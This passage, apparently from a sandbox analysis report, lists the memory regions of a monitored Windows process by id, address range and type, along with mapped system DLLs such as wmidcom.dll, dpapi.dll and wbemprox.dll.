0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2767 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2768 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2769 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2770 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2771 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2772 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 2773 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 2774 start_va = 0x1ac10000 end_va = 0x1ac1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac10000" filename = "" Region: id = 2775 start_va = 0x1ac20000 end_va = 0x1ac2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac20000" filename = "" Region: id = 2777 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2778 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2779 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2780 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2781 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2782 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2783 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2784 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2785 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2786 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2787 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2788 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2789 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2790 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2791 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2792 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2793 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2794 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2795 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2796 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2797 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2798 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2799 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2800 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2801 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2802 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2803 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2805 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2806 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2807 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2808 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2809 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2810 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2811 start_va = 0x1abf0000 end_va = 0x1abfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 2812 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2813 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2814 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2815 start_va = 0x7fff9fdc0000 end_va = 0x7fff9fe64fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.native.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.M870d558a#\\3848311070796cb1ab1cbaa71369c098\\Microsoft.Management.Infrastructure.Native.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.m870d558a#\\3848311070796cb1ab1cbaa71369c098\\microsoft.management.infrastructure.native.ni.dll") Region: id = 2817 start_va = 0x7fffbb530000 end_va = 0x7fffbb538fff monitored = 0 entry_point = 0x7fffbb532310 region_type = mapped_file name = "microsoft.management.infrastructure.native.unmanaged.dll" filename = "\\Windows\\System32\\Microsoft.Management.Infrastructure.Native.Unmanaged.dll" (normalized: "c:\\windows\\system32\\microsoft.management.infrastructure.native.unmanaged.dll") Region: id = 2818 start_va = 0x7fffbdcd0000 end_va = 0x7fffbdcf2fff monitored = 0 entry_point = 0x7fffbdcd20b0 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 2819 start_va = 0x7fffbdc70000 end_va = 0x7fffbdccffff monitored = 0 entry_point = 0x7fffbdc729d0 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 2820 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2821 start_va = 0x7fffbdc30000 end_va = 0x7fffbdc60fff monitored = 1 entry_point = 0x7fffbdc32ef0 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 2822 start_va = 0x7fffc9270000 end_va = 0x7fffc9279fff monitored = 0 entry_point = 0x7fffc9271850 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 2827 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2828 start_va = 0x1abf0000 end_va = 0x1ac2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001abf0000" filename = "" Region: id = 2829 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2830 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2831 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2832 start_va = 0x1a5d0000 end_va = 0x1a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5d0000" filename = "" Region: id = 2833 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 2834 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2835 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 2836 start_va = 0x1f90000 end_va = 0x1f90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f90000" filename = "" Region: id = 2837 start_va = 0x7fffb4d40000 end_va = 0x7fffb4d50fff monitored = 0 entry_point = 0x7fffb4d42aa0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2838 start_va = 0x7fffbe330000 end_va = 0x7fffbe3b5fff monitored = 0 entry_point = 0x7fffbe345570 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2839 start_va = 0x1a5d0000 end_va = 0x1a5d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001a5d0000" filename = "" Region: id = 2840 start_va = 0x1b900000 end_va = 0x1b97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b900000" filename = "" Region: id = 2841 start_va = 0x7fffb4780000 end_va = 0x7fffb4793fff monitored = 0 entry_point = 0x7fffb4781800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2842 start_va = 0x7fffb4820000 end_va = 0x7fffb492afff monitored = 0 entry_point = 0x7fffb4855c10 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2845 start_va = 0x1a5e0000 end_va = 0x1a5ecfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001a5e0000" filename = "" Region: id = 2846 start_va = 0x1a5e0000 end_va = 0x1a5e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001a5e0000" filename = "" Region: id = 2957 start_va = 0x1abf0000 end_va = 0x1abf5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001abf0000" filename = "" Region: id = 2960 start_va = 0x1ac00000 end_va = 0x1ac08fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001ac00000" filename = "" Region: id = 2961 start_va = 0x1ac00000 end_va = 0x1ac04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001ac00000" filename = "" Region: id = 2962 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 2963 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 2964 start_va = 0x1ac00000 end_va = 0x1ac0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac00000" filename = "" Region: id = 2966 start_va = 0x1b980000 end_va = 0x1b9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b980000" filename = "" Region: id = 2979 start_va = 0x1ba00000 end_va = 0x1ba7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba00000" filename = "" Region: id = 3002 start_va = 0x1a970000 end_va = 0x1a9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a970000" filename = "" Region: id = 3003 start_va = 0x7fff48200000 end_va = 0x7fff4820ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48200000" filename = "" Region: id = 3004 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3005 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3006 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3007 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3008 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3009 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3010 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3011 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3012 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3013 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3014 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3015 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3016 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3017 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3018 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3019 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3020 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3021 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3022 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3023 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3024 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3025 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3026 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3027 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3028 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3029 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3042 start_va = 0x1a9e0000 end_va = 0x1a9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9e0000" filename = "" Region: id = 3043 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3044 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3045 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3046 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3047 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3048 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3049 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3050 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3051 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3052 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3053 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3054 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3055 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3056 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3057 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3058 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3059 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3060 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3061 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3062 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3063 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3064 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3065 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3066 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3067 start_va = 0x1a970000 end_va = 0x1a9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a970000" filename = "" Region: id = 3068 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3069 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3070 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3071 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3072 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3073 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3074 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3075 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3076 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3077 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3078 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3079 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3080 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3081 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3082 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3083 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3084 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3085 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3086 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3087 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3088 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3089 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3090 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3091 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3092 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3093 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3094 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3095 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3096 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3097 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3098 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3099 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3100 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3101 start_va = 0x1a9d0000 end_va = 0x1a9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9d0000" filename = "" Region: id = 3102 start_va = 0x1a9e0000 end_va = 0x1a9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9e0000" filename = "" Region: id = 3103 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3104 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3105 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3106 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3107 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3108 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3109 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3110 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9c0000" filename = "" Region: id = 3111 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3112 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3113 start_va = 0x1a5e0000 end_va = 0x1a5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a5e0000" filename = "" Region: id = 3114 start_va = 0x1a9b0000 end_va = 0x1a9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9b0000" filename = "" Region: id = 3115 start_va = 0x1a9c0000 end_va = 0x1a9cffff monitored = 1 entry_point = 0x0 